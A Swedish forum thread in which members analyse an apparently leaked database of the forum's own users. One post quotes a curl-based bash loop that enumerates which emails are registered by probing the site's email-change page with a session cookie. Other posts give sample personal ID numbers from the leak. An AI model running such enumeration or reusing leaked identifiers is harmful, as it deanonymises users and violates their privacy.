Vinnaren i pepparkakshustävlingen!
2015-02-13, 18:54
  #157
Medlem
robomans avatar
Jag kollade också på personnumren. Fick det först till ca 83% män. Kollade på alla och konstaterade att de som ser ut att vara födda på 00-talet och dylikt mest handlar om att man skrivit ordningen månad-dag-år. Den som står allra överst är exempelvis 011075, dvs första oktober 1975. Inte den 75:e oktober 1901/2001.

För att få bort allt skrufs och ändå kolla in könsfördelningen kollade jag på 70- och 80-talisterna. De med korrekta personnummer födda under denna period visade sig vara ca 31 000 av användarna. 85% var män om man får tro personnumren.

Nedanstående tabell visar hur många som är födda vilket år, mellan 1950 och 1999. Dvs hur många personnummer som börjar på 50-99:

Det här kanske redan har gjorts? I så fall har jag missat det.
Citera
2015-02-13, 18:57
  #158
Medlem
Schweizergardes avatar
Citat:
Ursprungligen postat av roboman
Det här kanske redan har gjorts? I så fall har jag missat det.

Nej just den beräkningen har inte gjorts Tack!
Citera
2015-02-13, 19:02
  #159
Medlem
Dr.MadSciences avatar
Citat:
Ursprungligen postat av .Chloe
Jo, det var så jag gjorde. Tog väl en timme. Skulle gått snabbare om jag koda det i Python eller Perl. Nåväl, här kommer skriptet + förklaringen:

[PHP]while read line
do
a=$(curl -s --cookie "kakan för Flashback" --data "s=&do=updatepassword&currentpassword_md5=59bcc3ad 6775562f845953cf01624225&newpassword_md5=&newpassw ordconfirm_md5=&currentpassword=&newpassword=&newp asswordconfirm=&email="$line"&emailconfirm="$line "https://www.flashback.org/profile.php" | grep -o "<blockquote>")
echo $line "-" $a
done<email[/PHP]

Det hela sker på https://www.flashback.org/profile.php?do=editpassword - dvs den sidan där du kan byta din e-postadress. För att detta skript ska fungera så behöver du en kaka så Flashback vet att du är inloggad, dessutom behöver du veta en MD5-summa av ditt lösenord för den postas till Flashback när du vill byta e-postadress.

Koden är simpel att förstå. Den läser rad för rad ur en fil och gör sedan ett anrop mot Flashback, sedan får man resultatet tillbaka och jag fångar då in bara "<blockquote>", hittar jag inte denna sträng så kommer inget att skrivas ut.

Försöker du ändra till en e-post som redan finns på Flashback så möts du av:
HTML-koden för detta är:
HTML-kod:
<blockquote><p>E-postadressen som du har angivit används redan. Om du har glömt ditt lösenord kan du klicka <a href="login.php?do=lostpw">här</a>.</p></blockquote>
Och som ni ser, "<blockquote>", det är därför jag greppar efter "<blockquote>", hittar jag denna tag efter en POST så vet jag att adressen finns på Flashback, hittas ingenting så skrivs ingenting ut.
Aces, väl rutat, bäst gjort m.m! Men bara nån timme?? Hade förväntat mig nån lock-out/cool-down om man spammar skiten.
Citera
2015-02-13, 19:24
  #160
Bannlyst
Men .Chloe, vad menad du med detta som du skrev igår i din andra tråd


"Jag vet givetvis mer än vad jag säger, och jag har en bra anledning varför jag håller tyst. Sanningen är inte alltid lättande och härlig, den kan också vara jävligt skrämmande."

??
Citera
2015-02-13, 19:36
  #161
Medlem
.Chloes avatar
Citat:
Ursprungligen postat av Dr.MadScience
Aces, väl rutat, bäst gjort m.m! Men bara nån timme?? Hade förväntat mig nån lock-out/cool-down om man spammar skiten.
Haha, jag har fått myyycket kritik genom mina år för att inte använda sleep vid datainhämtning så felet är lite på min sida. Men absolut, Flashback borde begränsa efter typ 10 försök under en timme eller nått att man får vänta, eller helt enkelt ge ett osäkert svar:
"Om du angav en korrekt e-postadress så kommer ett bekräftelsemail att skickas ut den den angivna mailen"

Citat:
Ursprungligen postat av ColinCherry
Men .Chloe, vad menad du med detta som du skrev igår i din andra tråd
Att jag vet saker som jag inte kan bevisa. Skulle jag sagt allt jag visste så skulle 75%(resterande är väl vänner som vet att jag inte snackar skit) inte tro på mig och jag har ingen fakta att backa upp mina ord, så det är lönlöst. Det sista jag vill bli är en mytoman, speciellt på denna front.

Lika bra att publicera allt jag kan bevisa, vilket tyvärr är rätt lite i detta fall.
Citera
2015-02-13, 19:45
  #162
Bannlyst
Citat:
Ursprungligen postat av .Chloe
Haha, jag har fått myyycket kritik genom mina år för att inte använda sleep vid datainhämtning så felet är lite på min sida. Men absolut, Flashback borde begränsa efter typ 10 försök under en timme eller nått att man får vänta, eller helt enkelt ge ett osäkert svar:
"Om du angav en korrekt e-postadress så kommer ett bekräftelsemail att skickas ut den den angivna mailen"


Att jag vet saker som jag inte kan bevisa. Skulle jag sagt allt jag visste så skulle 75%(resterande är väl vänner som vet att jag inte snackar skit) inte tro på mig och jag har ingen fakta att backa upp mina ord, så det är lönlöst. Det sista jag vill bli är en mytoman, speciellt på denna front.

Lika bra att publicera allt jag kan bevisa, vilket tyvärr är rätt lite i detta fall.

du verkar ha ganska hög trovärdighet och tror faktiskt att de flesta skulle lita på vad du sa, men med andra ord är läget mycket värre än någon befarar och dem har i princip identifierat alla som skrivit här inne ungefär?
Citera
2015-02-13, 19:52
  #163
Medlem
Dr.MadSciences avatar
Citat:
Ursprungligen postat av .Chloe
Haha, jag har fått myyycket kritik genom mina år för att inte använda sleep vid datainhämtning så felet är lite på min sida. Men absolut, Flashback borde begränsa efter typ 10 försök under en timme eller nått att man får vänta, eller helt enkelt ge ett osäkert svar:
"Om du angav en korrekt e-postadress så kommer ett bekräftelsemail att skickas ut den den angivna mailen"
Lite komiskt ändå att det i detta fall är positivt att de inte förbättrat säkerheten de senaste månaderna (efter att RG kom med sitt påstående om att de hade FBs databas), exempelvis med en recaptcha, vilket skulle göra det smått omöjligt att verifiera emailaddresserna. För admins verkar ju inte vara vidare pigga på att ta i detta..

"Fate, It Seems, Is Not Without Its Sense Of Irony"

Citat:
Ursprungligen postat av .Chloe
Lika bra att publicera allt jag kan bevisa, vilket tyvärr är rätt lite i detta fall.
Äh, va inte så jante. Kudos skaru ha!
__________________
Senast redigerad av Dr.MadScience 2015-02-13 kl. 20:01.
Citera
2015-02-13, 20:05
  #164
Medlem
robomans avatar
I den där databasdumpen med 40000 rader förekommer närmare 3000 unika domäner. Bara 42 av dessa har >10 mailadresser kopplade till sig.

Jag tror att jag har funnit ytterligare ett stöd för att den här databasen är gammal som gatan. Topp 10 mailklienter ser ut som följer:
Kod:
hotmail.com	25667
gmail.com	4610
telia.com	1276
msn.com		900
spray.se	877
yahoo.se	823
bredband.net	593
home.se		549
yahoo.com	404
comhem.se	213

outlook.com, lanserat 2012 fanns inte med alls. Inte heller live.com eller live.se.
hotmail.se, som lanserades i början av 2010 fanns med vid 1 tillfälle. Detta får mig att misstänka att det bara är en felskrivning från personen som registrerade sig.

Men nu till det viktigaste. Hotmail förekommer 25 000 gånger. Gmail inte ens 5000 gånger. Hur många år tillbaka ska vi behöva gå för att hotmail ska vara 5 gånger så stor som gmail?

Jag har inte svaret. Den här artikeln säger att hotmail ännu i augusti 2012 hade 108 miljoner användare mot gmails 75 miljoner. Men det verkar oerhört svårt att få fram någon vettig statistik för det där. Särskilt som det troligen varierar oerhört mycket från land till land. Någon av er smartskaft kanske kan komma på något klyftigt.

(jag kan förresten ingen vettig programmering så jag extraherar bara det intressanta jag kan få ut mha excel)
__________________
Senast redigerad av roboman 2015-02-13 kl. 20:12.
Citera
2015-02-13, 20:16
  #165
Medlem
Ableachs avatar
Kod:
041064-036A
050182-175U
050782-106E
060671-017K
12057223969
1355715-8
4098042135

Ovanstående är några av de många exempel på felaktiga personnummer i listan.

Min första reaktion var att det ser ut som om någon kört OCR på en stor mängd dokument men inte kört någon rimlighetskontroll på resultatet. Det stödjer också teorin att informationen samlats ihop från flera olika källor.

Det förklarar däremot inte varför det bara är sista siffran som blivit bokstav på de 96 som har formatet NNNNNN-NNNA.

Inga buggar i omkastnings-scriptet, .Chloe?
Citera
2015-02-13, 20:18
  #166
Medlem
Schweizergardes avatar
GMail blev större än Hotmail först juni 2012.

Från dina siffror så utgör GMail bara 15% av totalen GMail+Hotmail (4610/30277).

Från den här grafen kan vi se att redan Okt-2007 så utgjorde GMail 29% av besökarsiffrorna GMail+Hotmail just då (20000/70000). Obs att detta är besökarsiffror, inte antal konton.

http://tctechcrunch2011.files.wordpress.com/2009/01/gmailvs-hotmailaol-chart.png

Sverige var nog ganska sena med att anamma GMail, utvecklingen tog nog fart runt ca år 2008 och framåt.

Men tycker det tyder på att databasen är ganska gammal ja. Notera dock att om läckan skedde t ex 2010, så betyder det inte att andelen GMail i FB-databasen motsvarar andelen GMail i världen just då, eftersom alla vid registrering antagligen inte använde en helt färsk adress utan också sådana som hade funnits ett tag. Därför så "laggar" GMail-användningen på Flashback. Sedan är det möjligt att folk vid den här tiden betraktade Hotmail mer som en "skräpmail" än GMail då det är mentalt mer "default" att bara skapa en ny Hotmail på 1 minut. Bara mina spekulationer.
__________________
Senast redigerad av Schweizergarde 2015-02-13 kl. 20:30.
Citera
2015-02-13, 20:24
  #167
Bannlyst
Går det att veta vilka addresser som är kopplade till Flashback och vilka som inte är det ?
Citera
2015-02-13, 20:31
  #168
Medlem
Schweizergardes avatar
Citat:
Ursprungligen postat av Ableach
Kod:
041064-036A
050182-175U
050782-106E
060671-017K
12057223969
1355715-8
4098042135

Ovanstående är några av de många exempel på felaktiga personnummer i listan.

Min första reaktion var att det ser ut som om någon kört OCR på en stor mängd dokument men inte kört någon rimlighetskontroll på resultatet. Det stödjer också teorin att informationen samlats ihop från flera olika källor.

Bra poäng angående OCR. Och det skulle ju i så fall kunna vara offentliga handlingar som scannats. Alltså sådant vi vet att Piscatus sysslar med.

Fast en komponent i detta är ganska systematisk, och det är att sista siffran ersatts med en bokstav A-Z. Detta verkar mer vara en systematiseringsgrej snarare än att OCR-scanningen alltid misslyckas med sista siffran, eller?

__________________
Senast redigerad av Schweizergarde 2015-02-13 kl. 21:02.
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in